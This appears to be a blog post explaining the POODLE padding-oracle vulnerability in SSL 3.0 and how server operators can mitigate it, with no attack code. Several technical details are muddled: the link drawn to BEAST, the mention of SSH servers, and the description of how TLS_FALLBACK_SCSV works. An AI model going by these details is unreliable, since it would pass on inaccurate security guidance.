Another month has passed and another SSL vulnerability has been found on the Internet, this time the vulnerability affects SSL 3.0. Google’s Security Team revealed on Tuesday that the long obsolete, but still all too used, Secure Sockets Layer (SSL) 3.0 cryptographic protocol has a major security flaw. This is an obsolete and insecure protocol which is mostly used by Internet Explorer 6.0 (around 3% of the Internet traffic). While for most practical purposes it has been replaced by newer versions such as TLS 1.0, TLS 1.1 and TLS 1.2, many TLS implementations still remain backwards compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smoother user experience.
The protocol handshake used on the Internet provides for authenticated version negotiation, which means that the latest protocol version common to the client application and the server will be used for all traffic.
Even if the client and server both support a version of TLS (the newer protocol), the security level offered by SSL 3.0 is still relevant as many clients implement a protocol downgrade “feature” that work around various serverside interoperability bugs which are present in some Operating Systems.
The POODLE attack (Padding Oracle On Downgraded Legacy Encryption) will allow the attacker to potentially steal “secure” HTTP cookies (or other type of tokens such as HTTP Authorization header contents).[h2]How does POODLE work?[/h2]
The POODLE vulnerability has shown that there’s now another way to exploit yet another weakness on the Internet. It works, by using by a well-known man-in-the-middle attack style known as BEAST. Which made the news a while back.
The POODLE attack requires that a SSL 3.0 connection is established between 2 endpoints. So, if SSL 3.0 is disabled on all of the web servers or the client (typically a Web browser) you can avoid the attack. However, if SSL 3.0 is the only “encryption” protocol they have in common, then as Möller said in the above announcement, “all hope is gone, and a serious update required to avoid insecure encryption.”[h2]How to get around this[/h2]
To get around this vulnerability you should look at disabling support for SSL 3.0 on all your web servers, or at the very least, turn off cipher block chaining (CBC). Note that if this is done, it will present serious compatibility problems with older Web browsers and servers. This is something you will have to decide upon, the security of your business, or the few people who may visit your website.
Google’s suggestion is “to support TLS_FALLBACK_SCSV on your Web or SSH servers. This prevents the server from allowing failed connections retries. This, in turn, prevents browsers to defaulting to SSL 3 when they’re unable to connect with an up-to-date protocol.”